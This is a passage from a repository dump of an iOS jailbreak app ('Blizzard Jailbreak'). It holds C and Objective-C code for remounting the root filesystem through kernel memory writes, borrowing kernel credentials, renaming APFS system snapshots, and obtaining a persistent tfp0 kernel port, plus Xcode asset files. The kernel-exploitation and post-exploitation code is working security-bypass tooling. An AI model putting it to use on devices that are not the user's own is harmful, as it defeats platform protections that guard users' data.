~MNT_RDONLY;\n v_flag &= ~MNT_ROOTFS;\n \n printf(\"ROOT FS REMOUNT: Flags after 0x%x\\n\", v_flag);\n wk32(v_mount + off_mnt_flag, v_flag);\n \n char *nmz = strdup(\"/dev/disk0s1s1\");\n int rv = mount(\"apfs\", \"/\", MNT_UPDATE, (void *)&nmz);\n free(nmz);\n printf(\"ROOT FS REMOUNT: Remounting /, return value = %d\\n\", rv);\n v_mount = rk64(rootfs_vnode + off_v_mount);\n wk32(v_mount + off_mnt_flag, v_flag);\n \n int fd = open(\"/RWTEST\", O_RDONLY);\n if (fd == -1) {\n fd = creat(\"/RWTEST\", 0777);\n } else {\n printf(\"ROOT FS REMOUNT: File already exists! Good!\\n\");\n }\n close(fd);\n printf(\"ROOT FS REMOUNT: %s\\n\", [[NSFileManager defaultManager] fileExistsAtPath:@\"/RWTEST\"] ? \"Successful!\" : \"FAILED!\");\n return [[NSFileManager defaultManager] fileExistsAtPath:@\"/RWTEST\"] ? YES : NO;\n}\n\nint remountRootFS() {\n int rv = -1, ret = -1;\n if (kCFCoreFoundationVersionNumber > 1451.51 && list_snapshots(\"/\")) {\n printf(\"****** DOING THE HARD REMOUNT ******\\n\");\n shouldReboot = 1;\n uint64_t devVnode = getVnodeAtPath(\"/dev/disk0s1s1\");\n if (devVnode == 0 || devVnode == -1){\n printf(\"FAIL!\\n\");\n return -1;\n }\n uint64_t specinfo = rk64(devVnode + off_v_specinfo);\n wk32(specinfo + off_specflags, 0);\n if ([[NSFileManager defaultManager] fileExistsAtPath:@\"/var/rootfsmnt\"])\n rmdir(\"/var/rootfsmnt\");\n \n mkdir(\"/var/rootfsmnt\", 0777);\n chown(\"/var/rootfsmnt\", 0, 0);\n printf(\"ROOT FS REMOUNT: Temporarily setting kernel credentials\\n\");\n uint64_t creds = copyPIDCredentials(getpid(), 0);\n if (mountDevAtPathAsRW(\"/dev/disk0s1s1\", \"/var/rootfsmnt\")) {\n printf(\"ROOT FS REMOUNT: Error mounting root at %s\\n\", \"/var/rootfsmnt\");\n }\n else {\n printf(\"ROOT FS REMOUNT: Disabling the APFS snapshot mitigations\\n\");\n char *snap = find_system_snapshot();\n if (snap && !renameAPFSSnapshot(\"/var/rootfsmnt\", snap, \"orig-fs\")) {\n rv = 0;\n unmount(\"/var/rootfsmnt\", 0);\n rmdir(\"/var/rootfsmnt\");\n }\n }\n printf(\"ROOT FS REMOUNT: Restoring our credentials\\n\");\n uint64_t proc_smp = proc_of_pid(getpid());\n wk64(proc_smp + off_p_ucred, creds);\n vnode_put(devVnode);\n if (rv) {\n printf(\"ROOT FS REMOUNT: Failed to disable the APFS snapshot mitigations\\n\");\n }\n else {\n printf(\"ROOT FS REMOUNT: Disabled the APFS snapshot mitigations\\n\");\n ret = 0;\n }\n }\n else {\n shouldReboot = 0;\n ret = 0;\n remount1126();\n }\n return ret;\n}\n\nextern char* const* environ;\nint spawnBinaryWithArgs(NSURL *launchPath,NSArray *arguments) {\n NSMutableArray *posixSpawnArguments=[arguments mutableCopy];\n [posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0];\n int argc=(int)posixSpawnArguments.count+1;\n printf(\"Number of posix_spawn arguments: %d\\n\",argc);\n char **args=(char**)calloc(argc,sizeof(char *));\n for (int i=0; i= 100 || rv == 0); i++) {\n usleep(100000);\n rv = access(filename, F_OK);\n }\n return rv;\n}\n\nconst char *systemSnapshot(char *bootHash) {\n if (!bootHash) {\n return NULL;\n }\n return [[NSString stringWithFormat:@APPLESNAP @\"%s\", bootHash] UTF8String];\n}\n\nint unjailbreakBlizzard(){\n printf(\"Blizzard Unjailbreak: Temporarily setting kernel credentials\\n\");\n uint64_t creds = copyPIDCredentials(getpid(), 0);\n if (kCFCoreFoundationVersionNumber < 1452.23) {\n int retval = fs_snapshot_rename(open(\"/\", O_RDONLY, 0), \"orig-fs\", systemSnapshot(copyBootHash()), 0);\n if (access(\"/var/MobileSoftwareUpdate/mnt1\", F_OK)) {\n int retv = mkdir(\"/var/MobileSoftwareUpdate/mnt1\", 0755);\n if (retv != 0){\n printf(\"Blizzard Unjailbreak: Failed to unjailbreak. Cannot access /var/MobileSoftwareUpdate/mnt1\\n\");\n printf(\"Blizzard Unjailbreak: Restoring our credentials\\n\");\n uint64_t proc_smp = proc_of_pid(getpid());\n wk64(proc_smp + off_p_ucred, creds);\n return -1;\n }\n }\n if (retval == 0){\n printf(\"Blizzard Unjailbreak: Successfully restored the default APFS Snapshot!\\n\");\n if (verifySnapshot(\"/\", \"orig-fs\") == 1) {\n retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@\"/sbin/mount_apfs\"], @[@\"-s\", @\"orig-fs\", @\"/\", @\"/var/MobileSoftwareUpdate/mnt1\"]);\n } else {\n retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@\"/sbin/mount_apfs\"], @[@\"-s\", [NSString stringWithFormat:@\"%s\", systemSnapshot(copyBootHash())], @\"/\", @\"/var/MobileSoftwareUpdate/mnt1\"]);\n }\n \n retval = checkifFileExistsAndWait(\"/var/MobileSoftwareUpdate/mnt1/sbin/launchd\");\n if (retval == 0){\n retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@\"/usr/bin/rsync\"], @[@\"-vaxcH\", @\"--progress\", @\"--delete-after\", @\"/var/MobileSoftwareUpdate/mnt1/.\", @\"/\"]);\n if (retval == 0){\n printf(\"Blizzard Unjailbreak: Restoring our credentials\\n\");\n uint64_t proc_smp = proc_of_pid(getpid());\n wk64(proc_smp + off_p_ucred, creds);\n return 0;\n }\n }\n }\n } else {\n int retvalue = fs_snapshot_rename(open(\"/\", O_RDONLY, 0), \"orig-fs\", systemSnapshot(copyBootHash()), 0);\n if (retvalue == 0){\n printf(\"Blizzard Unjailbreak: Restoring our credentials\\n\");\n uint64_t proc_smp = proc_of_pid(getpid());\n wk64(proc_smp + off_p_ucred, creds);\n return 0;\n }\n }\n return 0;\n}\n" }, { "path": "APFS Utilities/snapshot_tools.c", "content": "#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"../Exploits/sock_port/offsets.h\"\n#import \n#include \"../Exploits/sock_port/include/IOKit/IOKitLib.h\"\n#import \n#import \n#import \n#include \"snapshot_tools.h\"\n#include \"../Blizzard Jailbreak/BlizzardSpawnerTools.h\"\n#include \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n\ntypedef struct val_attrs {\n uint32_t length;\n attribute_set_t returned;\n attrreference_t name_info;\n} val_attrs_t;\n\nint list_snapshots(const char *vol){\n int dirfd = open(vol, O_RDONLY, 0);\n if (dirfd < 0) {\n perror(\"get_dirfd\");\n printf(\"List Snapshots: Failed to open file descriptor!\\n\");\n return -1;\n }\n struct attrlist alist = { 0 };\n char abuf[2048];\n alist.commonattr = ATTR_BULK_REQUIRED;\n int count = fs_snapshot_list(dirfd, &alist, &abuf[0], sizeof (abuf), 0);\n if (count < 0) {\n perror(\"fs_snapshot_list\");\n printf(\"List Snapshots: Failed to list Snapshots!\\n\");\n return -1;\n }\n char *p = &abuf[0];\n for (int i = 0; i < count; i++) {\n char *field = p;\n uint32_t len = *(uint32_t *)field;\n field += sizeof (uint32_t);\n attribute_set_t attrs = *(attribute_set_t *)field;\n field += sizeof (attribute_set_t);\n \n if (attrs.commonattr & ATTR_CMN_NAME) {\n attrreference_t ar = *(attrreference_t *)field;\n char *name = field + ar.attr_dataoffset;\n field += sizeof (attrreference_t);\n (void) printf(\"\\t ->> %s\\n\", name);\n }\n \n p += len;\n }\n return (0);\n}\n\nchar *copyBootHash() {\n io_registry_entry_t chosen = IORegistryEntryFromPath(kIOMasterPortDefault, \"IODeviceTree:/chosen\");\n unsigned char buf[1024];\n uint32_t size = 1024;\n char *hash;\n if (chosen && chosen != -1) {\n kern_return_t ret = IORegistryEntryGetProperty(chosen, \"boot-manifest-hash\", (char*)buf, &size);\n IOObjectRelease(chosen);\n if (ret) {\n printf(\"List Snapshots: Unable to read boot-manifest-hash\\n\");\n hash = NULL;\n }\n else {\n char *result = (char*)malloc((2 * size) | 1);\n memset(result, 0, (2 * size) | 1);\n \n int i = 0;\n while (i < size) {\n unsigned char ch = buf[i];\n sprintf(result + 2 * i++, \"%02X\", ch);\n }\n printf(\"List Snapshots: Hash: %s\\n\", result);\n hash = strdup(result);\n }\n }\n else {\n printf(\"List Snapshots: Unable to get IODeviceTree:/chosen port\\n\");\n hash = NULL;\n }\n return hash;\n}\n\nchar *find_system_snapshot() {\n const char *hash = copyBootHash();\n size_t len = strlen(hash);\n char *str = (char*)malloc(len + 29);\n memset(str, 0, len + 29);\n if (!hash) return 0;\n sprintf(str, \"com.apple.os.update-%s\", hash);\n printf(\"List Snapshots: System snapshot: %s\\n\", str);\n return str;\n}\n\nint createNewAPFSSnapshot(const char *volume, const char *snapshot) {\n int retvalue;\n printf(\"APFS Utilities: Preparing to create a new Snapshot...\\n\");\n int fileDescriptor = get_dirfd(volume);\n if (fileDescriptor < 0) {\n perror(\"open\");\n printf(\"APFS Utilities: Failed to create a Snapshot! Error at get_dirfd.\\n\");\n return -1;\n }\n retvalue = fs_snapshot_create(fileDescriptor, snapshot, 0);\n close(fileDescriptor);\n if (retvalue != 0) {\n perror(\"fs_snapshot_create\");\n printf(\"APFS Utilities: Failed to create a Snapshot! Error at fs_snapshot_create()\\n\");\n return -1;\n }\n return 0;\n}\n\nint renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw) {\n int retvalue;\n int fileDescriptor = open(volume, O_RDONLY);\n if (fileDescriptor < 0) {\n perror(\"open\");\n printf(\"APFS Utilities: RENAME: Cannot open file descriptor.\\n\");\n return -1;\n }\n retvalue = fs_snapshot_rename(fileDescriptor, snapshot, nw, 0);\n close(fileDescriptor);\n if (retvalue != 0) {\n perror(\"fs_snapshot_rename\\n\");\n printf(\"APFS Utilities: RENAME: Failed to rename a Snapshot! Error at fs_snapshot_rename()\\n\");\n }\n return 0;\n}\n\nint verifySnapshot(const char *vol, const char *name){\n struct attrlist attr_list = { 0 };\n attr_list.commonattr = ATTR_BULK_REQUIRED;\n char *buf = (char*)calloc(2048, sizeof(char));\n int retcount;\n int fd = open(vol, O_RDONLY, 0);\n while ((retcount = fs_snapshot_list(fd, &attr_list, buf, 2048, 0))>0) {\n char *bufref = buf;\n for (int i=0; ireturned.commonattr & ATTR_CMN_NAME) {\n printf(\"%s\\n\", (char*)(&entry->name_info) + entry->name_info.attr_dataoffset);\n if (strstr((char*)(&entry->name_info) + entry->name_info.attr_dataoffset, name)){\n return 1;\n }\n }\n bufref += entry->length;\n }\n }\n free(buf);\n close(fd);\n \n if (retcount < 0) {\n perror(\"fs_snapshot_list\");\n printf(\"List Snapshots: Failed to list snapshots!\\n\");\n return -1;\n }\n return 0;\n}\n\nint mountSnapshot(const char *vol, const char *name, const char *dir) {\n int proces_pid;\n proces_pid = launchProcessFrozen(\"/sbin/mount_apfs\", \"-s\", (char *)name, (char *)vol, (char *)dir, NULL, NULL, NULL);\n copyPIDCredentials(proces_pid, 0);\n kill(proces_pid, SIGCONT);\n int a;\n if (proces_pid != -1) waitpid(proces_pid, &a, 0);\n return WEXITSTATUS(a);\n}\n" }, { "path": "APFS Utilities/snapshot_tools.h", "content": "#ifndef apfs_util_h\n#define apfs_util_h\n\n#define get_dirfd(vol) open(vol, O_RDONLY, 0)\n\nchar *find_snapshot_with_ref(const char *vol, const char *ref);\nchar *find_system_snapshot(void);\n\nint createNewAPFSSnapshot(const char *volume, const char *snapshot);\nint renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw);\nint list_snapshots(const char *vol);\nint check_snapshot(const char *vol, const char *snap);\nchar *copyBootHash(void);\nint renameAPFSSnapshot(const char *vol, const char *snap, const char *nw);\nint verifySnapshot(const char *vol, const char *name);\n#endif\n/* apfs_util_h */\n" }, { "path": "Blizzard Jailbreak/AppDelegate.h", "content": "//\n// AppDelegate.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#import \n\n@interface AppDelegate : UIResponder \n\n@property (strong, nonatomic) UIWindow *window;\n\n\n@end\n\n" }, { "path": "Blizzard Jailbreak/AppDelegate.m", "content": "//\n// AppDelegate.m\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#import \"AppDelegate.h\"\n\n@interface AppDelegate ()\n\n@end\n\n@implementation AppDelegate\n\n\n- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {\n return YES;\n}\n\n\n- (void)applicationWillResignActive:(UIApplication *)application {\n // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.\n // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.\n}\n\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.\n // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.\n}\n\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.\n}\n\n\n- (void)applicationDidBecomeActive:(UIApplication *)application {\n // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.\n}\n\n\n- (void)applicationWillTerminate:(UIApplication *)application {\n // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.\n}\n\n\n@end\n" }, { "path": "Blizzard Jailbreak/Assets.xcassets/AppIcon.appiconset/Contents.json", "content": "{\n \"images\" : [\n {\n \"size\" : \"20x20\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"notification-icon@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"20x20\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"notification-icon@3x.png\",\n \"scale\" : \"3x\"\n },\n {\n \"size\" : \"29x29\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-small.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"29x29\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-small@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"29x29\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-small@3x.png\",\n \"scale\" : \"3x\"\n },\n {\n \"size\" : \"40x40\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-40@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"40x40\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-40@3x.png\",\n \"scale\" : \"3x\"\n },\n {\n \"size\" : \"57x57\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"57x57\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"60x60\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-60@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"60x60\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"icon-60@3x.png\",\n \"scale\" : \"3x\"\n },\n {\n \"size\" : \"20x20\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"notification-icon~ipad.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"20x20\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"notification-icon~ipad@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"29x29\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-small.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"29x29\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-small@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"40x40\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-40.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"40x40\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-40@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"50x50\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-small-50.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"50x50\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-small-50@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"72x72\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-72.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"72x72\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-72@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"76x76\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-76.png\",\n \"scale\" : \"1x\"\n },\n {\n \"size\" : \"76x76\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-76@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"83.5x83.5\",\n \"idiom\" : \"ipad\",\n \"filename\" : \"icon-83.5@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"size\" : \"1024x1024\",\n \"idiom\" : \"ios-marketing\",\n \"filename\" : \"ios-marketing.png\",\n \"scale\" : \"1x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "Blizzard Jailbreak/Assets.xcassets/Contents.json", "content": "{\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "Blizzard Jailbreak/Assets.xcassets/button_mask.imageset/Contents.json", "content": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"button_mask.png\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"button_mask-1.png\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"button_mask-2.png\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "Blizzard Jailbreak/Assets.xcassets/jailbreak_wallpaper.imageset/Contents.json", "content": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"jailbreak_wallpaper.png\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"jailbreak_wallpaper-1.png\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"jailbreak_wallpaper-2.png\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "Blizzard Jailbreak/Assets.xcassets/snow.imageset/Contents.json", "content": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"snow.png\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"snow-1.png\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"snow-2.png\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "Blizzard Jailbreak/Assets.xcassets/winter.imageset/Contents.json", "content": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"winter.png\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"winter-1.png\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"winter-2.png\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "Blizzard Jailbreak/Base.lproj/LaunchScreen.storyboard", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "Blizzard Jailbreak/Base.lproj/Main.storyboard", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "Blizzard Jailbreak/BlizzardLog.h", "content": "//\n// BlizzardLog.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import \n\nNS_ASSUME_NONNULL_BEGIN\n\n@interface BlizzardLog : UIViewController\n@property (weak, nonatomic) IBOutlet UIButton *dismissLog;\n@property (weak, nonatomic) IBOutlet UITextView *uiLogView;\n+ (instancetype)BlizzLogger;\n- (void)displaySnapshotNotice;\n- (void)customizeBtnAtUI;\n@end\n\nNS_ASSUME_NONNULL_END\n" }, { "path": "Blizzard Jailbreak/BlizzardLog.m", "content": "//\n// BlizzardLog.m\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import \"BlizzardLog.h\"\n#import \"../Kernel Utilities/system_reboot.h\"\n#import \"../Exploits/sock_port/exploit.h\"\n#import \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n#import \"../APFS Utilities/rootfs_remount.h\"\n#import \"../Exploits/FreeTheSandbox/freethesandbox.h\"\n#define currentVer(v) ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)\n@interface BlizzardLog()\n@end\n\nstatic BlizzardLog *BlizzLogger;\n\n@implementation BlizzardLog\n\n+ (instancetype)BlizzLogger {\n return BlizzLogger;\n}\n\nint dismissButtonActionType = 0;\nint IS_BLIZZARD_DEBUG = 0;\nint shouldUnjailbreak = 0;\n\n- (void)viewDidLoad {\n [super viewDidLoad];\n if (IS_BLIZZARD_DEBUG != 1){\n [self redirectSTD:STDOUT_FILENO];\n }\n NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);\n [self.uiLogView scrollRangeToVisible:lastLine];\n \n dispatch_async(dispatch_get_global_queue(0, 0), ^{\n [self runJailbreak];\n dispatch_async(dispatch_get_main_queue(), ^{\n //update UI in main thread.\n });\n });\n \n}\n-(void) runJailbreak {\n if (currentVer(\"11.4\")){\n if (ios11_exploit_init() == 0){\n if (shouldUnjailbreak == 1){\n if (unjailbreakBlizzard() == 0){\n dismissButtonActionType = 1;\n printf(\"Unjailbroken!\\n\");\n [self.dismissLog setTitle:@\"REBOOT DEVICE\" forState:UIControlStateNormal];\n }\n return;\n }\n if (remountFileSystem() == 0 && shouldReboot == 1 && shouldUnjailbreak != 1){\n dismissButtonActionType = 1;\n [self.dismissLog setTitle:@\"REBOOT DEVICE\" forState:UIControlStateNormal];\n } else {\n printf(\"Used the old remount, tee hee\\n\");\n installBootStrap();\n cleanupAfterBlizzard();\n }\n }\n } else if (currentVer(\"13.7\")){\n extern char *get_current_deviceModel(void);\n printf(\"Model: %s\\n\", get_current_deviceModel());\n printf(\"Version: %s\\n\", [[[UIDevice currentDevice] systemVersion] UTF8String]);\n \n extern uint64_t kaslr;\n extern mach_port_t tfp0_port;\n \n // Activate tfp0-persis program\n mach_port_t midi_bsport = 0;\n extern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);\n bootstrap_look_up(bootstrap_port, \"com.apple.midiserver\", &midi_bsport);\n if(!midi_bsport){\n //printf(\"run_exploit_or_achieve_tf0 failed: bootstrap_look_up has problem\\n\");\n exit(1);\n }\n \n mach_port_t stored_ports[3] = {0};\n stored_ports[0] = mach_task_self();\n stored_ports[2] = midi_bsport;\n mach_ports_register(mach_task_self(), stored_ports, 3);\n // Waiting for installation\n sleep(2);\n \n tfp0_port = 0;\n task_get_special_port(mach_task_self(), TASK_ACCESS_PORT, &tfp0_port);\n if(tfp0_port == 0){\n printf(\"require to run exploit first\\n\");\n \n extern bool check_device_compatibility(void);\n if(check_device_compatibility() == false){\n printf(\"Execution pause: Not found offsets set for current device(model: %s)\\n\", get_current_deviceModel());\n return;\n }\n \n extern void exploit_start(void);\n iOS13_exploit_init();\n \n printf(\"persis tfp0 installed, you can quit app now...\\n\");\n return;\n }\n stored_ports[2] = 0;\n mach_ports_register(mach_task_self(), stored_ports, 3);\n \n printf(\"tfp0: 0x%x\\n\", tfp0_port);\n pid_for_task(tfp0_port, (int*)&kaslr);\n printf(\"kaslr: 0x%x\\n\", (uint32_t)kaslr);\n \n }\n}\n- (IBAction)dismissLogWindow:(id)sender {\n if (dismissButtonActionType == 0){\n [self dismissViewControllerAnimated:YES completion:nil];\n } else if (dismissButtonActionType == 1){\n [self loadSystemNotif];\n }\n}\n\n-(void)textViewDidChange:(UITextView *)textView\n{\n NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);\n [self.uiLogView scrollRangeToVisible:lastLine];\n}\n\n- (void)redirectNotificationHandle:(NSNotification *)nf{\n NSData *data = [[nf userInfo] objectForKey:NSFileHandleNotificationDataItem];\n NSString *str = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];\n \n self.uiLogView.text = [NSString stringWithFormat:@\"%@\\n%@\",self.uiLogView.text, str];\n NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);\n [self.uiLogView scrollRangeToVisible:lastLine];\n [[nf object] readInBackgroundAndNotify];\n}\n\n- (void)redirectSTD:(int )fd{\n setvbuf(stdout, nil, _IONBF, 0);\n NSPipe * pipe = [NSPipe pipe] ;\n NSFileHandle *pipeReadHandle = [pipe fileHandleForReading] ;\n dup2([[pipe fileHandleForWriting] fileDescriptor], fd) ;\n \n [[NSNotificationCenter defaultCenter] addObserver:self\n selector:@selector(redirectNotificationHandle:)\n name:NSFileHandleReadCompletionNotification\n object:pipeReadHandle] ;\n [pipeReadHandle readInBackgroundAndNotify];\n}\n\n- (void)loadSystemNotif {\n dispatch_async(dispatch_get_main_queue(), ^{\n UIAlertController *apfsNoticeController = [UIAlertController alertControllerWithTitle:(@\"Blizzard Jailbreak\") message:(@\"The APFS Snapshot has been successfully renamed! Your device will reboot now. If you wanna jailbreak, please come back to the app and re-jailbreak upon reboot.\") preferredStyle:UIAlertControllerStyleAlert];\n [apfsNoticeController addAction:[UIAlertAction actionWithTitle:(@\"Dismiss\") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {\n reboot(RB_NOSYNC);\n }]];\n [self presentViewController:apfsNoticeController animated:YES completion:nil];\n });\n}\n\n@end\n" }, { "path": "Blizzard Jailbreak/BlizzardSpawnerTools.c", "content": "//\n// BlizzardSpawnerTools.c\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#include \"BlizzardSpawnerTools.h\"\n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n\nint launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {\n const char* args[] = {whom, arg1, arg2, arg3, arg4, arg5, arg6, NULL};\n pid_t process_pid;\n posix_spawnattr_t attr;\n posix_spawnattr_init(&attr);\n posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);\n int returnValue = posix_spawn(&process_pid, whom, NULL, &attr, (char **)&args, env);\n \n if (returnValue) {\n return returnValue;\n } else {\n return process_pid;\n }\n}\n" }, { "path": "Blizzard Jailbreak/BlizzardSpawnerTools.h", "content": "//\n// BlizzardSpawnerTools.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef BlizzardSpawnerTools_h\n#define BlizzardSpawnerTools_h\n\n#include \nint launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);\n\n#endif /* BlizzardSpawnerTools_h */\n" }, { "path": "Blizzard Jailbreak/Info.plist", "content": 